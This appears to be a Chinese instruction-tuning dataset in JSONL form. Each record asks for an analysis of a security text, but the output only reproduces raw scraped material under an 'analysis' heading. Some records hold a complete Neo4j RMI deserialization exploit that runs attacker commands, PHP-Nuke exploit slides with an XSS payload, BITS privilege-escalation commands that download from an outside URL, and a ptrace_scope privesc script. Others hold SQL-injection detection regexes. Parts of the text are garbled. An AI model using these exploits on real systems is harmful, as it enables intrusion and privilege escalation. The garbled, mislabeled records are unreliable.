{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSpring Part 2 SpringMVC 审了些Spring的项还是打算以开发的度从头看下Spring第部分之前发过遍这 次打做个补全跟着B站的视频看的迷迷糊糊视频快进看了个时感觉东也不多.....其 实直接上代码看别怎么写的更有效率点233333333 Part3 感觉看下源码分析较好额好像springboot也要简单过下虽然审过了但是查漏补 缺嘛~ Spring Part 1 四天学习总结 https://mp.weixin.qq.com/s/Qqu11XiZkWchhQ15y0J0_A SpringMVC 的基本概念 1. 三层架构 表现层业务层持久层 2.MVC MVC 全名是 Model View Controller是模型(model)视图(view)控制器(controller)的缩 写 是种于设计创建 Web 应程序表现层的模式 3.SpringMVC SpringMVC 是种基于 Java 的实现 MVC 设计模型的请求驱动类型的轻量级 Web 框架属于 Spring FrameWork 的后续产品已经融合在 Spring Web Flow Spring 框架提供了构建 Web 应程序的全功能 MVC 模块使 Spring 可插的 MVC 架构从在使 Spring 进 WEB 开发时可以选择使 Spring 的 Spring MVC 框架或集成其他 MVC 开发框架如 Struts1(现在般不)Struts2 等 SpringMVC 已经成为前最主流的 MVC 框架之并且随着 Spring3.0 的发布全超 越 Struts2成为最优秀的 MVC 框架它通过套注解让个简单的 Java 类成为处理请求 的控制器须实现任何接同时它还持RESTful 编程格的请求 4.SpringMVC优势 1清晰的划分 前端控制器DispatcherServlet 请求到处理器映射HandlerMapping 处理器适配器 HandlerAdapter 视图解析器ViewResolver 处理器或控制器Controller 验证器 Validator 命令对象Command 请求参数绑定到的对象就叫命令对象 表单对象Form Object 提供给表单展示和提交到的对象就叫表单对象 2分明确且扩展点相当灵活可以很容易扩展虽然乎不需要 3由于命令对象就是个 POJO需继承框架特定 API可以使命令对象直接作为业务对 象 4和 Spring 其他框架缝集成是其它 Web 框架所不具备的 5可适配通过 HandlerAdapter 可以持任意的类作为处理器 6可定制性HandlerMappingViewResolver 等能够常简单的定制 7功能强的数据验证格式化绑定机制 8利 Spring 提供的 Mock 对象能够常简单的进 Web 层单元测试 9本地化主题的解析的持使我们更容易进国际化和主题的切换 10强的 JSP 标签库使 JSP 编写更容易 还有如RESTful 格的持简单的件上传约定于配置的契约式编程 持基于注解的零配置持等等 5.SpringMVC与Strusts2对 共同点  它们都是表现层框架都是基于 MVC 模型编写的它们的底层都离不开原始 ServletAPI  它们处理请求的机制都是个核控制器 区别 Spring MVC 的是 Servlet,  Struts2 是 Filter  Spring MVC 是基于法设计的 Struts2 是基于类Struts2 每次执都会创建个动 作类所以 Spring MVC 会稍微 Struts2 快些  Spring MVC 使更加简洁,同时还持 JSR303, 处理 ajax 的请求更便  (JSR303 是套 JavaBean 参数校验的标准它定义了很多常的校验注解我们可以直 接将这些注解加在我们 JavaBean 的属性上就可以在需要校验的时候进校验了)  Struts2 的 OGNL 表达式使的开发效率相 Spring MVC 更些但执效率并没有  JSTL 提升尤其是 struts2 的表单标签远没有 html 执效率 SpringMVC的请求相应流程 1服务器启动应被加载读取到 web.xml 中的配置创建 spring 容器并且初始化容器中的 对象 2浏览器发送请求被 DispatherServlet 捕获该 Servlet 并不处理请求是把请求转发出 去转发的路径是根据请求 URL匹配@RequestMapping 中的内容 3匹配到了后执对应法该法有个返回值 4根据法的返回值借助 InternalResourceViewResolver 找到对应的结果视图 5渲染结果视图响应浏览器 三些类的简单理解 1.DispatcherServlet前端控制器 户", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n渗 透 测试 之信 息搜 集 的 研 究 与 漏 洞 防 范   张 明 航 张卷美   北京 电 子科 技学院 北京 １ ０ ００ ７０     １ ５４ ０１ ０１ ６２ ３ ｑ ｑ  ｃｏｍ    Ｒ ｅ ｓｅａｒｃｈ ａｎｄ Ｖｕ ｌｎｅｒａｂ ｉ ｌ ｉ ｔｙ Ｐｒｅｖｅｎ ｔｉｏｎ ｏｆ Ｉｎ ｆｏｒｍａ ｔ ｉｏｎ  Ｇａｔ ｈｅｒｉｎ ｇ ｉｎ   Ｐ ｅｎ ｅｔ ｒａｔ ｉｏｎ  Ｔｅｓｔ   Ｚｈａ ｎｇ  Ｍ ｉｎｇ ｄｕ ｏ ａ ｎ ｄ Ｚｈａｎ ｇ Ｊ ｕ ａｎｍ ｅｉ   Ｂｅｉｊ ｉｎｇ  Ｅｌｅｃｔｒｏｎ ｉ ｃ Ｓ ｃｉｅｎｃｅ    Ｔｅｃｈｎｏｌｏｇｙ Ｉｎ ｓｔ ｉ ｔｕｔｅ  Ｂｅｉｊ ｉｎｇ １ ０ ００ ７０    Ａ ｂｓｔｒａｃｔ Ｐ ｅｎｅ ｔｒａ ｔ ｉｏｎ  ｔｅ ｓｔ  ｄｏ ｅｓ  ａ ｔｈｏｒｏ ｕｇ ｈ ｓｅ ｃｕｒｉｔｙ ｒｅｖ ｉ ｅｗ ｆｏｒ ｎｅｔｗｏｒ ｋ ｓ ｙ ｓ ｔｅｍ ａｎ ｄ ｇ ｉｖ ｅｓ  ｔｈｅ  ａｄｖｉｃ ｅ   ｏ ｆ ｖ ｕｌｎ ｅｒａｂ ｉ ｌ ｉｔｙ  ｏ ｒ ｉ ｎ ａｐ ｐ ｒｏ ｐ ｒ ｉａ ｔ ｅ  ｃ ｏｎ ｆｉ ｇ ｕｒａ ｔ ｉ ｏｎ ｂｙ ｓ ｉ ｍｕ ｌ ａｔ ｉ ｎｇ ｒｅ ａ ｌ ａｔｔａｃ ｋｓ  Ａｓ ｔ ｈｅ ｆｉ ｒｓ ｔ ｓ ｔａｇ ｅ ｏｆ  ｌ ｉｆ ｅ   ｃｙｃ ｌｅ  ｏ ｆ ｐ ｅｎ ｅｔｒａ ｔ ｉｏ ｎ ｔ ｅ ｓｔ   ｔｈｅ  ｔａ ｓ ｋ ｏｆ ｉｎ ｆｏ ｒｍａ ｔ ｉｏ ｎ  ｃｏｌ ｌ ｅｃ ｔｉｏ ｎ ｉ ｓ ｔｏ ｃｏｌ ｌｅｃ ｔ ｄｅ ｔａ ｉｌ ｅ ｄ ｉｎ ｆｏ ｒｍａ ｔ ｉｏ ｎ  ｗｈｉ ｃ ｈ   ｄｅ ｔｅｒｍ ｉｎｅ ｓ ｔｈｅ  ｓ ｕｃ ｃｅ ｓｓ ｏｆ  ａ ｗｈｏ ｌｅ  ｐｅｎｅｔｒａｔ ｉｏ ｎ ｔｅｓｔ  ｔｏ ａ ｌａｒ ｇｅ  ｅｘｔｅ ｎｔ  Ｔｈ ｉ ｓ ｐ ａｐｅ ｒ ｓ ｔｕｄ ｉｅ ｓ ｔｈｅ  ｖａｒｉｏｕｓ   ｍ ｅｔ ｈｏｄ ｓ ａｎ ｄ ｔ ｅ ｃｈｎｏ ｌｏｇｙ  ｉ ｎ ｔ ｈｅ ｉ ｎｆ ｏｒｍａ ｔ ｉ ｏｎ  ｇ ａ ｔｈｅｒ ｉ ｎｇ  ｓ ｔａ ｇ ｅ  ｐ ｕｔ ｓ ｔｈｅ  ｔｏｏ ｌ ｓ ｐｒ ｏｖｉ ｄｅ ｄ ｂｙ  Ｋ ａ ｌ ｉ Ｌ ｉ ｎｕ ｘ   ｉｎ ｔ ｏ ｐｒ ａｃ ｔ ｉ ｃｅ   ｓｕｍｍ ａｒ ｉ ｅｓ ｔｈｅ  ｃｏｍｍ ｏｎ  ｖｕ ｌｎｅｒａｂ ｉ ｌ ｉ ｔｙ  ｉｎ ｔｈ ｉ ｓ ｓ ｔ ａｇ ｅ ａｎ ｄ ｐ ｒｏ ｐｏｓ ｅｓ  ａ ｃｏｍｐｒ ｅｈｅｎｓ ｉｖ ｅ   ｐ ｒｅ ｖｅｎｔ ｉ ｖｅ  ｍｅａｓ ｕｒ ｅ ｉ ｎ ｔｈｅ  ｅ ｎｄ   Ｋｅｙ  ｗ ｏｒ ｄｓ ｐ ｅ ｎｅ ｔ ｒａ ｔｉ ｏｎ  ｔ ｅ ｓｔ  ｉ ｎｆ ｏｒｍ ａｔ ｉ ｏｎ  ｇａ ｔ ｈｅ ｒｉ ｎ ｇ  Ｋａ ｌ ｉ  Ｌ ｉｎｕ ｘ  ｖｕｌ ｎｅ ｒａｂ ｉ ｌｉ ｔｙ   ｐ ｒｅ ｖｅ ｎｔ ｉ ｖｅ  ｍｅ ａｓｕ ｒｅ   摘 要 渗透 测 试技术 通过模拟 真 实 的 攻 击 来对 网 络 系 统进行全 面 的 安 全 审 查  并给 出 漏 洞 或 不 恰   当 配 置 的修复 建议 作为 整 个渗透 测 试 生命周 期 的 第 １ 阶段  信 息 搜 集 的 任务 是尽 可能 多 地搜 集 到   有 关 目 标 的 详 细 信息  它 在很大程度上 决 定 了 一 次渗透 测 试 的 成 功 与 否  分 块研 究 了 信息 搜 集 阶段   中 所 用 到 的 各种方 法 与 技术  利 用 Ｋａ ｌ ｉ  Ｌ ｉｎｕｘ 中 提供 的 工 具 进行 了 深入 的 实 战操作  最后 总 结 归 纳   了 本 阶段 中 常 见的 漏 洞 并提 出 了 较 为 完 善 的 防 范 措施    关键 词 渗透 测 试  信 息 搜 集  Ｋ ａｌ ｉ Ｌ ｉｎｕ ｘ  漏 洞  防 范 措施   中 图 法分类号 ＴＰ ３ ０ １  ４   渗 透测试  ｐ ｅ ｎｅ ｔ ｒａ ｔｉ ｏｎ  ｔｅ ｓ ｔ  １ ２  是 一 种 通过模 种安全业界 比 较流 行 的方法体系 标准  ３   各体 系   拟 恶意攻击者 的 技术与 方法  挫败 目 标系 统安全 标准之 间虽 略有 差异  但均 将 一个完整 的 渗 透测   控制 措施  取得访问 控制权  并发现具备业务影 响 试分为若干 个前后承接  互有关联 的 几个阶段  首   后果安全隐 患 的 一种 安全测 试与 评估方法  渗 透 当 其冲 的第 １ 阶段便是对 目 标", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nimport java.io.Serializable; import java.rmi.Naming; import sun.rmi.registry.RegistryImpl_Stub; import org.neo4j.shell.ShellServer; public class Neo4jAttacker { public static String TARGET_BINDING = \"shell\"; public static void main(String[] args) throws Exception { if (args.length != 2) { System.out.println(\"Usage: java -jar Neo4jAttacker.jar [target] [command]\" + \"\\nExample: java -jar Neo4jAttacker.jar rmi://127.0.0.1:1337 \\\"touch /tmp/success\\\"\"); System.exit(1); } boolean validBinding = checkBinding(TARGET_BINDING, args[0]); if (!validBinding) { System.out.println(\"[-] No valid binding found, shell server may not be listening. Exiting\"); System.exit(2); } System.out.println(\"[+] Found valid binding, proceeding to exploit\"); ShellServer server = (ShellServer) Naming.lookup(args[0] + \"/\" + TARGET_BINDING); Object payload = Payload.getObject(args[1]); //Here server.shutdown may also be callable without auth, just in case the exploit fails and you just want to turn the thing off try { server.setSessionVariable(newClientId(), \"anything_here\", payload); } catch (Exception UnmarshalException ) { System.out.println(\"[+] Caught an unmarshalled exception, this is expected.\"); System.out.println(UnmarshalException.getMessage()); } System.out.println(\"[+] Exploit completed\"); } public static boolean checkBinding(String bindingToCheck, String targetToCheck) { System.out.println(\"Trying to enumerate server bindings: \"); try { RegistryImpl_Stub stub = (RegistryImpl_Stub) Naming.lookup(targetToCheck); for (String element : stub.list()) { System.out.println(\"Found binding: \" + element); if (element.equalsIgnoreCase(bindingToCheck)) return true; } return false; } catch (Exception ex) { return false; } } public static Serializable newClientId() { return Integer.valueOf(1); } }", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntest === 执行条件表达式 ## 概要 ```shell test [expr] ``` ## 主要用途 - 执行条件表达式 ## 参数 ### 文件操作符 ```shell -a FILE 如果文件存在则为true -b FILE 如果文件是块特殊的则为true -c FILE 如果文件是特殊字符则为true -d FILE 如果文件是目录则为true -e FILE 如果文件存在则为true -f FILE 如果文件存在并且是常规文件则为true -g FILE 如果文件是set-group-id则为true -h FILE 如果文件是符号链接则为true -L FILE 如果文件是符号链接则为true -k FILE 如果文件的粘滞位sticky设置了则为true -p FILE 如果文件是命名管道则为true -r FILE 如果您可以读取文件则为true -s FILE 如果文件存在且不为空则为true -S FILE 如果文件是套接字则为true -t FD 如果在终端上打开FD则为True -u FILE 如果文件是set-user-id则为true -w FILE 如果文件可写则为true -x FILE 如果您可以执行文件则为true -O FILE 如果文件有效地归您所有则为true -G FILE 如果文件有效地归您的组所有则为true -N FILE 如果文件自上次读取以来已被修改则为true FILE1 -nt FILE2 根据修改日期如果 file1 比 file2 新则为true FILE1 -ot FILE2 根据修改日期如果 file1 比 file2 旧则为true FILE1 -ef FILE2 如果 file1 为 file2 的硬链接则为true ``` ### 字符串运算符 ```shell -z STRING 如果字符串为空则为true -n STRING 如果字符串不为空则为true STRING 如果字符串不为空则为true STRING1 = STRING2 如果字符串相等则为true STRING1 = STRING2 如果字符串不相等则为true STRING1 < STRING2 如果 STRING1 的字典排序在 STRING2 之前则为true STRING1 > STRING2 如果 STRING1 在字典排序在 STRING2 之后则为true ``` ### 其他运算符 ```shell -o OPTION 如果启用了shell选项OPTION则为true -v VAR 如果设置了shell变量VAR则为true -R VAR 如果设置了shell变量VAR并且是变量引用则为true EXPR 如果expr为假则为true EXPR1 -a EXPR2 如果expr1和expr2都为true则为true EXPR1 -o EXPR2 如果expr1或expr2为true则为true arg1 OP arg2 算术表达式测试 OP是 -eq-ne-lt-le-gt-ge 中的一个算术表达式为真时返回true ``` ## 返回值 如果表达式执行结果为成功时返回0当表达式执行结果为失败或给出非法参数时返回1 ## 例子 ```shell # 执行条件表达式并显示返回值 [root@pc root]$ test ! \"abc\" == 123; echo $? 0 # 等价形式注意方括号 [ 后面的空格以及方括号 ] 前面的空格 [root@pc root]$ [ ! \"abc\" == 123 ]; echo $? 0 [root@pc root]$ [[ ! \"abc\" == 123 ]]; echo $? 0 ``` ### 注意 1. 该命令等价于 `[` 2. 编写 bash 条件表达式可用内建命令 `test` `[` 组合命令 `[[` > - 关于条件表达式可以查看[这里](http://www.gnu.org/software/bash/manual/html_node/Bash-Conditional-Expressions.html#Bash-Conditional-Expressions) > - 关于内建命令的索引可以查看[这里](http://www.gnu.org/software/bash/manual/html_node/Builtin-Index.html#Builtin-Index) > - 关于组合命令的索引可以查看[这里](http://www.gnu.org/software/bash/manual/html_node/Reserved-Word-Index.html#Reserved-Word-Index) 3. 该命", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH TRUE 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 true \\- 成功地什么都不做 .SH 概述 \\fBfalse\\fP [\\fI\\,忽略命令行参数\\/\\fP] .br \\fBtrue\\fP \\fI\\,选项\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 以表示成功的状态值退出 .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .PP 注意您的 shell 可能内置了自己的 true 程序版本它通常会覆盖这里所提及的相应版本请查阅您的 shell 文档获知它所支持的选项 .SH 作者 由 Jim Meyering 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/true> .br 或者在本地使用 info \\(aq(coreutils) true invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n最近忍者师傅因为某件事情寝食不安所以给他写篇星球文安抚他寂寞的心灵 https://my.oschina.net/9199771/blog/5085337 书接上文之前提到我们可以用java版的libinjection进行sql注入防护 那么我今天花了一天的时间在sqlmap的level=5 和 risk=3的情况下对拼接的sql进行安全测试本文不涵盖tamper否则本文的内容会异常复杂 在试验过程中我发现其实很多的报错情况以及一些sql报错可以看到一些 libinjection 没有对应防护策略的端倪 上文中提到了GTID_SUBSET注入问题 testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)' 其实还有一个JSON_KEYS注入问题 testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)' 除此之外我们还能发现利用存储过程sleep函数SELECT CASE WHEN等绕过 libinjection语义策略的问题 所以我在上文的基础上经过了反复的试验得出了在语义检查前使用正则表达式进行安全防护的一些注意要点其中我们要注意 rasp 默认阻断sql 报错的请求 以下正则均来自于modsecurity的内置正则 @RequestMapping(\"list5\") public User getList5(String name) { if (name == null) { name = \"dato\"; } String pattern = \"\\\\W{4}\"; if(Pattern.compile(pattern).matcher(name).find()){ // 很有用的规则阻断四个连续的特殊字符能拦截很多明显的payload return null; } pattern = \"((?:[~!@#$%&*()\\\\-+={}\\\\[\\\\]|:;\\\"'`<>][~!@#$%&*()\\\\-+={}\\\\[\\\\]|:;\\\"'`<>]*?){6})\"; if(Pattern.matches(pattern, name)) { // 一个变量超过6个特殊字符就很可能是sql注入 return null; } pattern = \"(?i:sleep\\\\(\\\\s*?\\\\d*?\\\\s*?\\\\)|benchmark\\\\(.*?,.*?\\\\))\"; if(Pattern.compile(pattern).matcher(name).find()){ // 这条可以不加入因为rasp或常见的数据库中间件都阻断了sleepbenchmark等常见的恶意函数这里加入的原因是语义引擎拦截sleep注入时不全面 // 这条语句是存在 bypass 的建议不用使用正则拦截本文是为了演示,所以增加该语句 return null; } pattern = \"(?i:(?:create\\\\s+(?:procedure|function)\\\\s*?\\\\w+\\\\s*?\\\\(\\\\s*?\\\\)\\\\s*?-|;\\\\s*?(?:declare|open)\\\\s+[\\\\w-]+|procedure\\ if(Pattern.compile(pattern).matcher(name).find()){ // 这条可以不加入不少工作场景中的数据库已不支持存储过程这里加入的原因是语义引擎拦截对 procedure analyse 注入基本拦截不到 // 这条语句是存在 bypass 的建议不用使用正则拦截本文是为了演示,所以增加该语句 return null; } if(SQLParse.isSQLi(name)){ return null; } // 执行sql select * from user where name='${name}' 除了上文提到的在rasp中内置语义检测的思路其实今天我还发现能将安全过滤做到fastjson之中也就是对用户输入数据进行自动化的处理 那我们如何将该思路进行拓展呢 参考以上代码我们可以修改fastjson的源码对反序列化数据的 parse parseObject parseArray 方法进行重写将数据输入进行过滤 这种解决思路主要针对安全编码能力普遍很弱的团队而执行力强的团队可以很好的使用预编译避免sql注入 也就是利用将安全过滤嵌入到每一个变量中而不是每一次http请求中利用这种思路 防止攻击者利用各种编码手段导致的sql注入绕过后续还能增加xss的防护策略 降低整体", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSmart Contract Hacking Konstantinos Karagiannis CTO, Security Consulting, BT Americas @KonstantHacker when transactions arent enough  The key component is this idea of a Turing- complete blockchain  --Vitalik Buterin meowputting that computing to use smart contracts billions, or just millions, of reasons problem isnt going away Solidity dev tools  .sol files > bytecode > blockchain  Atom with plugins:  language-ethereum  etheratom  Remix: browser based oyente and Manticore MAIAN basic methodology  Interview devs  Review .sol file  Try compiling  Dissect code flow  Run oyente (cross fingers)  Run Manticore  Run MAIAN  Manually check for following vulns reentrancy leave off the first re- for savings reentrancy (and irony) in the dao code default public  Parity wallet hack initWallet execute Parity multisig wallet hack 2 Parity 2 transactions not going with the (over)flow 2256 -1 unchecked send in king of the ether unchecked send gas limits withdraw dont send withdrawn not sent encryption transaction-ordering dependence transaction-ordering dependence call-stack depth limit variable or function ambiguity odds and ends  Timestamp dependence  Business logic flaws  Separating public/private data things might be getting better? keep in touch @KonstantHacker", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Random Noise (staganography) In this challenge, we're given a file that is in fact 2 pngs: ``` [michal@Bobik] [/dev/ttys004] [~/Desktop]> binwalk final.png DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 PNG image, 799 x 397, 8-bit colormap, non-interlaced 821 0x335 Zlib compressed data, default compression 3360 0xD20 PNG image, 799 x 397, 8-bit/color RGBA, non-interlaced 3401 0xD49 Zlib compressed data, default compression ``` They both contain clues essential to the solution of the challange: The first image contains some data on the lowest bits of each color of the upper row: ![lsb](lsb.png) Which we can extract using a simple python script: ``` python def chunks(l, n): \"\"\"Yield successive n-sized chunks from l.\"\"\" for i in range(0, len(l), n): yield l[i:i + n] with open(\"lsb.pnm\") as f: dots = f.read().split(\"\\n\") pixels = chunks(dots, 3) data = \"\" for pix in list(pixels)[:-1]: pix = map(int, pix) r, g, b = pix data += str(r&1) data = map(lambda x:chr(int(x,2)), chunks(data, 8)) print(''.join(data)) ``` ``` [michal@Bobik] [/dev/ttys004] [~/Desktop]> python parse_lsb.py key for vigenere cipher: THISKEYCANTBEGUESSED (not the flag) ``` Let's move on to the second picture: ![second](second.png) We actually spent quite a while on this stage but finally came up with a good guess: let's sort the pixels by colors, if they in fact random the distribution should be quite equal, right? ![sorted](sorted.png) Some weird anomalies, let's filter theese out in the original image: ![second_ans](second_ans.png) Bingo!, it's [a morse](https://i.pinimg.com/originals/f8/9d/35/f89d3592cc9c024df2e003f0468e5c85.jpg) `WSIYSWFGYLHVNAMXKSZHWUMG` If we now decipher it using the vigenre password we get: `HEYYOUJUSTSAVEDNEO`", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nmasSEXploitation The Rook http://ppdhuluperak.gov.my Defaced!  and the next day.... PHPNuke.org too!? Eleonore Exploit Pack.  What I cannot create, I do not understand.  Richard Feynman Why? Overview Layers of security. --Unkown Complexity is the worst enemy of security. --Bruce Schneier ManageEngine Firewall Analyzer 5  CSRF  Execute SQL quires (Not injection)  Create a new administrative account  XSS  The results from a sql query  SELECT <script>alert(/xss/)</script> Profense Web Application Firewall  \"Defenses against all OWASP Top Ten vulnerabilities\"  CSRF - CVE-2009-0468  Proxy for MITM  Configuration changes  Shutdown the machine (DoS)  Reflective XSS - CVE-2009-0467 The PHP-Nuke Exploit (Aug 2009)  PHP-Nuke 8.1.35  (User account Required!)  SQL Injection  Get admin  Broken admin  Path disclosure  Filter Bypass  Another sql injection  Local File Include (Nov 2004)  PHP-Nuke 7.0  SQL Injection  Get admin  Broken admin  Enable phpBB  Filter Bypass  Eval() The PHP-Nuke Exploit The PHP-Nuke Exploit The PHP-Nuke Exploit  (OWASP A1) SQL Injection  (OWASP A3) Broken Authentication  (CWE-200) Information Exposure  (CWE-436) Filter Bypass  (OWASP A1) SQL Injection (Again!)  (CWE-98) Local File Include (LFI) The PHP-Nuke Exploit The PHP-Nuke Exploit  (OWASP A1) SQL Injection  (OWASP A3) Broken Authentication  (CWE-200) Information Exposure  (CWE-436) Filter Bypass  (OWASP A1) SQL Injection (Again!)  (CWE-98) Local File Include (LFI) DEMO! Fruit Analogy PHP-Nuke Exploit  OWASP A1: Injection  SQL Injection in the Journal module to get administrative credentials PHP-Nuke Exploit  OWASP A3: Broken Authentication and Session Management      Shortcut to admin privileges PHP-Nuke Exploit  PHP-Nuke Login:  Secure Login: Overview  PoC Exploit: PHPSecInfo Rocks! Demo!  Why 2 sql injection exploits? (CWE-436)Filter Bypass  '%20union%20'  '*/union/*'  ' union ' (CWE-436)Filter Bypass  '%20union%20'  '*/union/*'  ' union ' PHPMyAdmin CSRF+SQLi=RCE (CVE-2008-5621) PHP-Nuke Exploit  ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSECURITY 1 Rate-limiting State The edge of the Internet is an unruly place Paul Vixie, Farsight Security By design, the Internet core is stupid, and the edge is smart. This design decision has enabled the Internets wildcat growth, since without complexity the core can grow at the speed of demand. On the downside, the decision to put all smartness at the edge means were at the mercy of scale when it comes to the quality of the Internets aggregate traffic load. Not all device and software builders have the skillsand the quality assurance budgetsthat something the size of the Internet deserves. Furthermore, the resiliency of the Internet means that a device or program that gets something importantly wrong about Internet communication stands a pretty good chance of working well enough in spite of its failings. Witness the hundreds of millions of CPE (customer-premises equipment) boxes with literally too much memory for buffering packets. As Jim Gettys and Dave Taht have been demonstrating in recent years, more is not better when it comes to packet memory.1 Wireless networks in homes and coffee shops and businesses all degrade shockingly when the traffic load increases. Rather than the fair-share scheduling we expect, where N network flows will each get roughly 1/Nth of the available bandwidth, network flows end up in quicksand where they each get 1/(N2) of the available bandwidth. This isnt because CPE designers are incompetent; rather, its because the Internet is a big place with a lot of subtle interactions that depend on every device and software designer having the samelargely undocumentedassumptions. Witness the endless stream of patches and vulnerability announcements from the vendors of literally every smartphone, laptop, or desktop operating system and application. Bad guys have the time, skills, and motivation to study edge devices for weaknesses, and they are finding as many weaknesses as they need to inject malicious code into our precious devices where they can t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBITSInject Control your BITS, get SYSTEM Dor Azouri Security Researcher @SafeBreach BITS Background & Terms PowerShell bitsadmin ... BITS Job Download Upload Upload-Reply COM Interfaces (C/C++) qmgrprxy.dll qmgr.dll State File More Background Available since 2001 (Windows XP) Most known use: Windows Update Advanced features Known Malicious Uses BITS as a malware downloader As a persistency mechanism (e.g. DNSChanger/Zlob.Q) As C&C communication DEMO The Abuse The inspiration? the way WU downloads and installs updates The Drive? Jealousy  of how WU adds SYSTEM jobs The Enabling Feature SetNotifyCmdLine Naive Try bitsadmin /CREATE I_WANT_YOUR_SYSTEM bitsadmin /ADDFILE I_WANT_YOUR_SYSTEM http://site.com/software.exe c:\\temp\\software.exe God Created a Rock He Cant Pick Up bitsadmin /CANCEL I_WANT_YOUR_SYSTEM Unable to add file to job - 0x800704dd The operation being requested was not performed because the user has not logged on to the network How Does wuaueng Do the Things He Does? CoSwitchCallContext to the COM intf of qmgr.dll qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload How Does wuaueng Do the Things He Does? CoSwitchCallContext to the COM intf of qmgr.dll qmgr!CJobManagerExternal::CreateJob -> qmgr!CJob::AddFile -> qmgr!CJob::Resume -> qmgr!CJob::Transfer -> qmgr!CJob::BeginDownload Going after wuaueng Compare flow of calls between wuaueng and bitsadmin 1. qmgr!CJobManagerExternal::CreateJob -- identical 2. qmgr!CJobExternal::AddFile -- identical, but: Exception is thrown here (0x800704dd) Faking Session ID SwitchToLogonToken {Client SID} = (From Job object) {Session ID} = GetTokenInformation(12) CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} Faking Session ID SwitchToLogonToken {Client SID} = (From Job object) {Session ID} = GetTokenInformation(12) CloneUserToken CLoggedOnUsers::FindUser({SID},...) in {Session ID} {SYSTEM} is NOT logged on in session {1} Faking ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJanuary 17 2003 Whistleblowers and Team Players  an Islands in the Clickstream It was only after whistleblowers came out of the closet during the Great Deflation that Time Magazine honored the practice of what team players call ratting out your pals. Conservative magazines like Time may give lip service to whistleblowing in the abstract but never champion whistle blowers until after they have sung. Instead they support the conditions and practices which make whistleblowers a threat in the first place. Whistleblowers are a reminder that ethics must be embodied in real flesh-and-blood human beings who put themselves on the line. Unless our deeper beliefs and values become flesh, they are words words words designed to make us feel better, rationalize misdeeds, and send distracting pangs of conscience straight into space. If you have never known a real flesh-and-blood whistleblower, see the film The Insider for a good portrait. The film confirms the conclusion of a Washington law firm specializing in whistleblower cases that lists motivations for whistleblowing  money, anger and resentment, revenge, justice  and eliminates all but one as sufficient to carry a whistleblower through the abuse they will face. Only acting from a pained conscience will sustain a whistleblower through the ordeal. During a recent speech for accountants about ethics, our Q&A moved quickly into the gray areas where accountants spend much of their time. Outsiders think accountants live in a black and white grid with simple answers but in fact they wade through a swamp of maybe this or maybe that. Accountants are paid whistleblowers. Accountants are intended to be in the corporate culture but not of it, to use company books like mirrors to reveal the truth and consequences of choices. Thats why it is so difficult to do the job right. The tension comes from the fact that only an individual can have a conscience. An institution or organization can develop a culture that supports doing the right thin", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#!/usr/bin/env bash ####################################################### # # # 'ptrace_scope' misconfiguration # # Local Privilege Escalation # # # ####################################################### # Affected operating systems (TESTED): # Parrot Home/Workstation 4.6 (Latest Version) # Parrot Security 4.6 (Latest Version) # CentOS / RedHat 7.6 (Latest Version) # Kali Linux 2018.4 (Latest Version) # Authors: Marcelo Vazquez (s4vitar) # Victor Lasa (vowkin) #!\"[s4vitar@parrot]\"[~/Desktop/Exploit/Privesc] ##\"\" $./exploit.sh # #[*] Checking if 'ptrace_scope' is set to 0... [] #[*] Checking if 'GDB' is installed... [] #[*] System seems vulnerable! [] # 0x00 Linux ptrace_scope 0x01 0x02 0x03 0x04 exp #[*] Starting attack... #[*] PID -> sh #[*] Path 824: /home/s4vitar #[*] PID -> bash #[*] Path 832: /home/s4vitar/Desktop/Exploit/Privesc #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> sh #[*] Path #[*] PID -> bash #[*] Path 1816: 